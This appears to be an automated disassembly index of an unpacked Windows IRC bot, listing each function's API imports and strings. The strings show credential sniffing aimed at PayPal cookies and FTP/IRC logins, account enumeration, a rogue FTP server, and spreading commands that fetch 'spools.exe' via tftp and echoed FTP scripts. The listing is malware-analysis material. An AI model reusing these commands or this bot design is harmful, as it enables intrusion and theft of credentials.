Index of %s</TIT"... "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""... "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"... ".." "." "PM" "AM" "%2.2d/%2.2d/%4d %2.2d:%2.2d %s" "<%s>" "PRIVMSG %s :%-31s %-21s\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "%s%s/" "\"><CODE>%.29s>/</CODE></A>" "\"><CODE>%s/</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "<%s>" "%-31s %-21s\r\n" "PRIVMSG %s :%-31s %-21s (%s bytes)\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "\"><CODE>%.30s></CODE></A>" "\"><CODE>%s</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "%-31s %-21s (%i bytes)\r\n" "PRIVMSG %s :Found %s Files and %s Direc"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "Found: %i Files and %i Directories\r\n" </pre></td></tr><tr id="sub_418E3D"><td><pre><a name="sub_418E3D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418E3D">sub_418E3D</a>(73e2): KERNEL32.GetVersionExA KERNEL32.LoadLibraryA KERNEL32.GetProcessHeap "netapi32.dll" "NetMessageBufferSend" </pre></td></tr><tr id="sub_41A2A9"><td><pre><a name="sub_41A2A9"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A2A9">sub_41A2A9</a>(7918): KERNEL32.CloseHandle </pre></td></tr><tr id="sub_4180E3"><td><pre><a name="sub_4180E3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4180E3">sub_4180E3</a>(7aa9): "-|`_\\{[]}" "-|`_\\{[]}" "-|`_\\{[]}" "-|`_\\{[]}" </pre></td></tr><tr id="sub_41B2E4"><td><pre><a name="sub_41B2E4"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41B2E4">sub_41B2E4</a>(7bea): KERNEL32.GetVersionExA "95" "NT" "98" "ME" "2K" "XP" "2003" "???" "%s (%s)" "couldn't resolve host" </pre></td></tr><tr id="sub_4264BC"><td><pre><a name="sub_4264BC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4264BC">sub_4264BC</a>(822d): "invalid string position" </pre></td></tr><tr id="sub_426290"><td><pre><a name="sub_426290"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_426290">sub_426290</a>(822d): "string too long" </pre></td></tr><tr id="sub_41E142"><td><pre><a name="sub_41E142"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E142">sub_41E142</a>(84ec): KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_42280E"><td><pre><a name="sub_42280E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_42280E">sub_42280E</a>(8647): NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_41AD75"><td><pre><a name="sub_41AD75"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41AD75">sub_41AD75</a>(86cb): KERNEL32.GetTickCount "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"... "\r\n" </pre></td></tr><tr id="sub_4109AC"><td><pre><a name="sub_4109AC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4109AC">sub_4109AC</a>(86fe): KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_40B29C"><td><pre><a name="sub_40B29C"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40B29C">sub_40B29C</a>(8732): "%s %s stopped. (%d thread(s) stopped.)" "%s No %s thread found." </pre></td></tr><tr id="sub_41979A"><td><pre><a name="sub_41979A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41979A">sub_41979A</a>(893c): "Account: %S" "Full Name: %S" "User Comment: %S" "Comment: %S" "Unknown" "Administrator" "User" "Guest" "Privilege Level: %s" "Auth Flags: %d" "Home Directory: %S" "Parameters: %S" "Password Age: %d" "Bad Password Count: %d" "Number of Logins: %d" "Last Logon: %d" "Last Logoff: %d" "Logon Server: %S" "Country Code: %d" "User's Language: %d" "Max. Storage: %d" </pre></td></tr><tr id="sub_41D214"><td><pre><a name="sub_41D214"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41D214">sub_41D214</a>(8af0): NTDLL.RtlUnwind </pre></td></tr><tr id="sub_4193FD"><td><pre><a name="sub_4193FD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4193FD">sub_4193FD</a>(8cdb): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_417EC3"><td><pre><a name="sub_417EC3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417EC3">sub_417EC3</a>(8dd5): "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."... </pre></td></tr><tr id="sub_418982"><td><pre><a name="sub_418982"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418982">sub_418982</a>(8e50): KERNEL32.GlobalLock KERNEL32.GlobalUnlock </pre></td></tr><tr id="sub_40C665"><td><pre><a name="sub_40C665"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C665">sub_40C665</a>(9078): KERNEL32.CreateThread KERNEL32.Sleep KERNEL32.CloseHandle </pre></td></tr><tr id="sub_41DA8E"><td><pre><a name="sub_41DA8E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41DA8E">sub_41DA8E</a>(91cb): KERNEL32.GetFileAttributesA NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_41DF04"><td><pre><a name="sub_41DF04"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41DF04">sub_41DF04</a>(95ea): KERNEL32.MultiByteToWideChar NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_41AD5B"><td><pre><a name="sub_41AD5B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41AD5B">sub_41AD5B</a>(963b): KERNEL32.GetTickCount </pre></td></tr><tr id="sub_40F77A"><td><pre><a name="sub_40F77A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40F77A">sub_40F77A</a>(9713): WS2_32.WSAStartup WS2_32.socket WS2_32.inet_addr WS2_32.ntohs WS2_32.connect WS2_32.closesocket WS2_32.WSACleanup </pre></td></tr><tr id="sub_423D26"><td><pre><a name="sub_423D26"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_423D26">sub_423D26</a>(9a80): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="sub_419CE8"><td><pre><a name="sub_419CE8"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419CE8">sub_419CE8</a>(9bb4): "Invalid parameter." "Server name not found." "This network request is not supported." "Not enough memory." "The name is invalid." "Duplicate share name." "Invalid for redirected resource." "Device or directory does not exist." "Level parameter is invalid." "A general failure occurred in the netwo"... "The operation is allowed only on the pr"... "The user account already exists." "The group already exists." "The password is shorter than required ("... "An unknown error occurred." "The computer name is invalid." "Share not found." "The user name could not be found." "Network connection not found." </pre></td></tr><tr id="sub_418AE3"><td><pre><a name="sub_418AE3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418AE3">sub_418AE3</a>(9dbe): "SeShutdownPrivilege" </pre></td></tr><tr id="sub_419F45"><td><pre><a name="sub_419F45"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419F45">sub_419F45</a>(9f88): KERNEL32.lstrcmpiA KERNEL32.OpenProcess KERNEL32.CloseHandle "SeDebugPrivilege" " %s (%d)" "SeDebugPrivilege" </pre></td></tr><tr id="sub_40CEEA"><td><pre><a name="sub_40CEEA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40CEEA">sub_40CEEA</a>(a2f7): WS2_32.send </pre></td></tr><tr id="sub_41D721"><td><pre><a name="sub_41D721"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41D721">sub_41D721</a>(a580): KERNEL32.GetLocalTime </pre></td></tr><tr id="sub_419B68"><td><pre><a name="sub_419B68"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419B68">sub_419B68</a>(a909): "Username accounts for local system:" " %S" "Total users found: %d." </pre></td></tr><tr id="sub_418FE1"><td><pre><a name="sub_418FE1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418FE1">sub_418FE1</a>(a9bc): NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_419EDA"><td><pre><a name="sub_419EDA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419EDA">sub_419EDA</a>(aacd): KERNEL32.CloseHandle </pre></td></tr><tr id="sub_40A729"><td><pre><a name="sub_40A729"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40A729">sub_40A729</a>(ac3c): "Kernel32.dll failed. <%d>" "User32.dll failed. <%d>" "Advapi32.dll failed. <%d>" "Gdi32.dll failed. <%d>" "Ws2_32.dll failed. <%d>" "Wininet.dll failed. <%d>" "Icmp.dll failed. <%d>" "Netapi32.dll failed. <%d>" "Dnsapi.dll failed. <%d>" "Iphlpapi.dll failed. <%d>" "Mpr32.dll failed. <%d>" "Shell32.dll failed. <%d>" "Odbc32.dll failed. <%d>" "Avicap32.dll failed. <%d>" </pre></td></tr><tr id="sub_42676B"><td><pre><a name="sub_42676B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_42676B">sub_42676B</a>(aeff): KERNEL32.RaiseException </pre></td></tr><tr id="sub_41E11E"><td><pre><a name="sub_41E11E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E11E">sub_41E11E</a>(af5c): KERNEL32.ExitProcess </pre></td></tr><tr id="sub_4194CF"><td><pre><a name="sub_4194CF"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4194CF">sub_4194CF</a>(afa1): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="sub_416FAA"><td><pre><a name="sub_416FAA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_416FAA">sub_416FAA</a>(b2db): "Cdrom" "Network" "Disk" "Invalid" "Unknown" </pre></td></tr><tr id="sub_421717"><td><pre><a name="sub_421717"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_421717">sub_421717</a>(b4bf): "KERNEL32" "IsProcessorFeaturePresent" </pre></td></tr><tr id="sub_409A6D"><td><pre><a name="sub_409A6D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_409A6D">sub_409A6D</a>(b83b): KERNEL32.GetModuleHandleA NTDLL.RtlGetLastWin32Error KERNEL32.LoadLibraryA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "ClearEventLogA" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "icmp.dll" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "NetWkstaGetInfo" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" "avicap32.dll" "capCreateCaptureWindowA" "capGetDriverDescriptionA" </pre></td></tr><tr id="sub_412B76"><td><pre><a name="sub_412B76"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_412B76">sub_412B76</a>(b9cf): "HTTP sniff" "#mss2" "paypal" "PAYPAL" "PAYPAL.COM" "paypal.com" "Set-Cookie:" </pre></td></tr><tr id="sub_4230EC"><td><pre><a name="sub_4230EC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4230EC">sub_4230EC</a>(b9f1): KERNEL32.GetEnvironmentStringsW KERNEL32.GetEnvironmentStringsA KERNEL32.WideCharToMultiByte KERNEL32.FreeEnvironmentStringsW </pre></td></tr><tr id="sub_4018A1"><td><pre><a name="sub_4018A1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4018A1">sub_4018A1</a>(bc9b): KERNEL32.Sleep </pre></td></tr><tr id="sub_418D50"><td><pre><a name="sub_418D50"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418D50">sub_418D50</a>(c073): "spools.exe" "cmd /k echo open %s %d >> ii &echo user"... </pre></td></tr><tr id="sub_40AF44"><td><pre><a name="sub_40AF44"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AF44">sub_40AF44</a>(c0f8): KERNEL32.GetTickCount "[%d]" </pre></td></tr><tr id="sub_40B562"><td><pre><a name="sub_40B562"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40B562">sub_40B562</a>(c3fd): " Total: %d in %s." </pre></td></tr><tr id="sub_4189BD"><td><pre><a name="sub_4189BD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4189BD">sub_4189BD</a>(c558): KERNEL32.CreateFileA KERNEL32.CloseHandle "mIRC" "explorer.exe" </pre></td></tr><tr id="sub_41EF81"><td><pre><a name="sub_41EF81"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41EF81">sub_41EF81</a>(c6bf): KERNEL32.ReadFile NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_40AC10"><td><pre><a name="sub_40AC10"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AC10">sub_40AC10</a>(cb72): KERNEL32.GetTickCount "%s" </pre></td></tr><tr id="sub_41CF70"><td><pre><a name="sub_41CF70"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41CF70">sub_41CF70</a>(cba9): NTDLL.RtlUnwind </pre></td></tr><tr id="sub_41EA06"><td><pre><a name="sub_41EA06"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41EA06">sub_41EA06</a>(cbe8): NTDLL.RtlReAllocateHeap NTDLL.RtlAllocateHeap KERNEL32.VirtualAlloc NTDLL.RtlFreeHeap </pre></td></tr><tr id="start"><td><pre><a name="start"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#start">start</a>(cdf3): "Spool Service" </pre></td></tr><tr id="sub_412BFD"><td><pre><a name="sub_412BFD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_412BFD">sub_412BFD</a>(cfb4): "VULN sniff" "#mss2" "OpenSSL/0.9.6" "Serv-U FTP Server" "OpenSSH_2" </pre></td></tr><tr id="sub_4107A0"><td><pre><a name="sub_4107A0"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4107A0">sub_4107A0</a>(d1bd): KERNEL32.CreateFileA KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle </pre></td></tr><tr id="sub_420F11"><td><pre><a name="sub_420F11"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_420F11">sub_420F11</a>(d2f6): KERNEL32.RaiseException </pre></td></tr><tr id="sub_41BA78"><td><pre><a name="sub_41BA78"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41BA78">sub_41BA78</a>(d50c): NTDLL.RtlAllocateHeap NTDLL.RtlReAllocateHeap </pre></td></tr><tr id="sub_413CC1"><td><pre><a name="sub_413CC1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_413CC1">sub_413CC1</a>(d826): WS2_32.socket WS2_32.ioctlsocket WS2_32.connect KERNEL32.Sleep WS2_32.closesocket </pre></td></tr><tr id="sub_4245B2"><td><pre><a name="sub_4245B2"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4245B2">sub_4245B2</a>(d8fa): KERNEL32.SetUnhandledExceptionFilter </pre></td></tr><tr id="sub_417D85"><td><pre><a name="sub_417D85"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417D85">sub_417D85</a>(d935): "\n" </pre></td></tr><tr id="sub_417228"><td><pre><a name="sub_417228"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417228">sub_417228</a>(dc5b): "A:\\" </pre></td></tr><tr id="sub_41A702"><td><pre><a name="sub_41A702"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A702">sub_41A702</a>(dcb6): "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" </pre></td></tr><tr id="sub_40AB6A"><td><pre><a name="sub_40AB6A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AB6A">sub_40AB6A</a>(e076): "%d.%d.%d.%d" </pre></td></tr><tr id="sub_41088B"><td><pre><a name="sub_41088B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41088B">sub_41088B</a>(e1a1): "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... </pre></td></tr><tr id="sub_41E369"><td><pre><a name="sub_41E369"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E369">sub_41E369</a>(e71f): NTDLL.RtlAllocateHeap </pre></td></tr><tr id="sub_40C574"><td><pre><a name="sub_40C574"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C574">sub_40C574</a>(e730): KERNEL32.CreateThread KERNEL32.Sleep KERNEL32.CloseHandle </pre></td></tr><tr id="sub_418F1D"><td><pre><a name="sub_418F1D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418F1D">sub_418F1D</a>(ec5e): KERNEL32.GetTickCount </pre></td></tr><tr id="sub_4157A6"><td><pre><a name="sub_4157A6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4157A6">sub_4157A6</a>(edda): KERNEL32.GetLocalTime "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" </pre></td></tr><tr id="sub_416029"><td><pre><a name="sub_416029"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_416029">sub_416029</a>(ef39): "r" "=" "=" </pre></td></tr><tr id="sub_40C9E6"><td><pre><a name="sub_40C9E6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C9E6">sub_40C9E6</a>(f1cc): "�B�B�B�B" "CCCC" "0" </pre></td></tr><tr id="sub_417156"><td><pre><a name="sub_417156"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417156">sub_417156</a>(f5ac): "failed" </pre></td></tr><tr id="sub_417517"><td><pre><a name="sub_417517"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417517">sub_417517</a>(f759): KERNEL32.LoadLibraryA KERNEL32.GetEnvironmentVariableW "SeDebugPrivilege" "NTDLL.DLL" "NtQuerySystemInformation" "RtlCreateQueryDebugBuffer" "RtlQueryProcessDebugInformation" "RtlDestroyQueryDebugBuffer" "RtlRunDecodeUnicodeString" "USERNAME" "USERDOMAIN" "SeDebugPrivilege" </pre></td></tr><tr id="sub_4099D2"><td><pre><a name="sub_4099D2"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4099D2">sub_4099D2</a>(f7eb): KERNEL32.Sleep "NOTICE" "PRIVMSG" "%s" "%s %s :%s\r\n" </pre></td></tr><tr id="sub_41A311"><td><pre><a name="sub_41A311"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A311">sub_41A311</a>(f806): KERNEL32.Sleep "PRIVMSG %s :%s\r" "%s" </pre></td></tr><tr id="sub_417BE6"><td><pre><a name="sub_417BE6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417BE6">sub_417BE6</a>(f82b): KERNEL32.GetProcessHeap NTDLL.RtlAllocateHeap NTDLL.RtlFreeHeap </pre></td></tr><tr id="sub_418065"><td><pre><a name="sub_418065"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418065">sub_418065</a>(fa09): KERNEL32.CreateThread </pre></td></tr><tr id="sub_4176E9"><td><pre><a name="sub_4176E9"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4176E9">sub_4176E9</a>(fc23): KERNEL32.GetProcessHeap NTDLL.RtlAllocateHeap NTDLL.RtlFreeHeap "WINLOGON" "NWGINA" "MSGINA" </pre></td></tr><tr id="sub_41BC09"><td><pre><a name="sub_41BC09"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41BC09">sub_41BC09</a>(fd6e): NTDLL.RtlAllocateHeap </pre></td></tr><tr id="sub_425CC1"><td><pre><a name="sub_425CC1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_425CC1">sub_425CC1</a>(fe6c): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_40E18F"><td><pre><a name="sub_40E18F"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40E18F">sub_40E18F</a>(ff7b): WS2_32.socket WS2_32.inet_addr WS2_32.ntohs WS2_32.connect WS2_32.setsockopt WS2_32.send WS2_32.recv WS2_32.closesocket KERNEL32.Sleep "�" </pre></td></tr></table><script> document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff"); </script> </html>

sub_outside():
	KERNEL32.Sleep
	KERNEL32.GetTickCount
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.ExitProcess
	WS2_32.getsockname
	KERNEL32.GetLocaleInfoA
	KERNEL32.GetVersionExA
	NTDLL.RtlDeleteCriticalSection
	KERNEL32.InitializeCriticalSectionAndSpinCount
	WS2_32.socket
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	KERNEL32.ReadFile
	KERNEL32.GetFileAttributesA
	KERNEL32.GetLocalTime
	WS2_32.WSASocketA
	KERNEL32.SetFilePointer
	KERNEL32.GetSystemInfo
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.ReadProcessMemory
	KERNEL32.VirtualQueryEx
	NTDLL.RtlFreeHeap
	KERNEL32.CreatePipe
	KERNEL32.GetCurrentProcess
	KERNEL32.GetVersion
	KERNEL32.LCMapStringW
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte
	KERNEL32.UnhandledExceptionFilter
	KERNEL32.GetStringTypeW
	KERNEL32.SetUnhandledExceptionFilter
	KERNEL32.LoadLibraryA

sub_41703B(019e):
	"%sKB"
	"failed"

sub_423896(01a3):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

sub_40B9DD(0285):
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error

	"spools.exe"

sub_41B12D(04c3):
	KERNEL32.GetTickCount

	"%dd %dh %dm"

sub_412AEF(078a):
	"FTP	sniff"
	"#mss2"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"

sub_419201(0b6c):
	NTDLL.RtlGetLastWin32Error

	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"	 Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"

sub_412A79(0d1f):
	"IRC	sniff"
	"#mss2"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"

sub_4188F8(0dc3):
	NTDLL.RtlGetLastWin32Error

	"%s	Error: %s <%d>."

sub_40C034(0e3b):
	KERNEL32.GetTickCount
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep

	"sym"

sub_40EAA2(0ff5):
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

	"spools.exe"
	"cmd /k echo open %s %d >> ii &echo user"...

sub_41AA26(1084):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"

sub_425D2F(125c):
	KERNEL32.CompareStringW
	KERNEL32.CompareStringA
	KERNEL32.MultiByteToWideChar

sub_4112D7(16d0):
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.TerminateThread
	KERNEL32.CloseHandle

sub_410B3D(17b8):
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error

sub_40FCEC(1922):
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...

sub_40BEFB(22a3):
	"%d.%d.%d.%d"

sub_417B4F(2950):
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap

sub_41A252(29dc):
	KERNEL32.CloseHandle

sub_401135(2a97):
	KERNEL32.Sleep
	KERNEL32.CloseHandle
	KERNEL32.ExitProcess

sub_40F168(2b32):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.bind
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

	"220 StnyFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 StnyFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"[FTP]: I just	owned: %s"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"

sub_415BF1(2bb5):
	"Window"

sub_417A19(2cb7):
	KERNEL32.GetSystemInfo
	KERNEL32.VirtualQueryEx
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap
	KERNEL32.CloseHandle

sub_40F891(2d16):
	"GET "
	" "
	"\r\n"

sub_41BE83(2e10):
	KERNEL32.ExitProcess

sub_42464C(33c3):
	KERNEL32.WideCharToMultiByte

	"TZ"

sub_40E699(3595):
	KERNEL32.Sleep

	"spools.exe"
	"tftp -i %s get %s\r\n"

sub_418C8D(3f0f):
	KERNEL32.GetVersionExA
	NTDLL.RtlGetLastWin32Error

sub_419533(3fe3):
